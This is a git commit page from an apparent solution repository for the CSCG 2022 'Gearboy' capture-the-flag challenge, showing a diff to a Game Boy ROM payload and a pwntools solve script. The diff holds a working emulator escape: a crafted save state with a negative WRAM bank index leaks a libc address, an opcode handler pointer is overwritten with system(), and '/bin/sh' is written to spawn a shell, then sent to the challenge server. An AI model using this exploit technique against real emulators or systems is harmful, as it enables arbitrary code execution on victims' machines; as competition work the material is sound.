cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy
Log | Files | Refs | sfeed.txt
commit a1f7b8843f887d2d698477d6d8544e545a517725
parent 3464878abafda13241f2eaed3db8bfd696ee4b67
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 19:06:59 +0200

Working local using unstable offsets

Diffstat:

Mmain.c | 26+++++++++++++++-----------


Msolve.py | 40+++++++++-------------------------------


2 files changed, 24 insertions(+), 42 deletions(-)

diff --git a/main.c b/main.c
@@ -5,29 +5,33 @@ void
 main(void)
 {
 	volatile static uint8_t *processor;
+	volatile static uint8_t *memory;
 	volatile static uint64_t op0x00;
 	volatile static uint64_t base;
-	volatile static uint64_t load_rom;
+	volatile static uint64_t libc;
+	volatile static uint64_t leak;
+	volatile static uint64_t target;
+
+	/* NEEDS TO BE FIRST SESSION OF CONTAINER! */
 
 	/* processor - wrambanks = -0x126a0 */
 
 	/* WRAM BANK = -0x13 */
 	processor = (void*) 0xD960;
+	memory = processor - 0xd0;
 
-	/* leak opcode 0x00 to get base */
-	op0x00 = *(uint64_t*)processor;
-	base = op0x00 - 0x1d420;
-	load_rom = base + 0x34ad0;
-
-	/* set opcode 0x10 to load_rom */
-	*(uint64_t*)(processor+0x10*0x10) = load_rom;
+	/* leak libc from addr */
+	leak = *(uint64_t*)(memory + 0x30);
+	libc = leak + 0x125cff0;
+	target = libc + 0x52290; /* system */
 
-	/* write /bin/sh to processor pointer (opcode 0x00) */
-	strcpy(processor, "/home/ctf/wrapper.py");
+	/* set opcode 0x00 (nop) to gadget */
+	strcpy(processor, "/bin/sh");
+	*(uint64_t*)(processor+0x10*0x10) = target;
+	// *(uint64_t*)(processor+0x10*0x10) = 0;
 
 	__asm \
 		stop \
-		halt \
 	__endasm;
 
 	while (1);
diff --git a/solve.py b/solve.py
@@ -6,37 +6,15 @@ from pwn import *
 
 context.log_level = "error"
 
-def send(rom, state):
-    #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
-    io = process("ncat localhost 1024".split())
-    io.sendline(b64encode(open(rom, "rb").read()))
-    io.sendline(b64encode(open(state, "rb").read()))
-    data = io.readuntil(b"Got EOF")
-    io.close()
-    return data
+rom = list(open("main.gb", "rb").read())
+state = list(open("main.state", "rb").read())
 
-def set_wrambanks(filename, index):
-    data = open(filename, "rb").read()
-    data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
-    with open(filename, "wb+") as f:
-        f.write(data)
+for i,v in enumerate(struct.pack("<i", -0x13)):
+    state[0x10000+i] = v
 
-def find_heap_start():
-    search_space = (-256, -90)
-    while search_space[0] + 1 != search_space[1]:
-        testval = (search_space[1] + search_space[0]) // 2
-        print(search_space)
+io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
+#io = process("ncat localhost 1024".split())
+io.sendline(b64encode(bytes(rom)))
+io.sendline(b64encode(bytes(state)))
 
-        set_modstate(testval)
-
-        data = send("main.gb", "main.state")
-        if b"exit code 139" in data:
-            search_space = (testval, search_space[1])
-        else:
-            search_space = (search_space[0], testval)
-
-    print("OFFSET", testval)
-
-set_wrambanks("main.gb", -0x37)
-
-print(send("main.gb", "main.state").decode())
+io.interactive()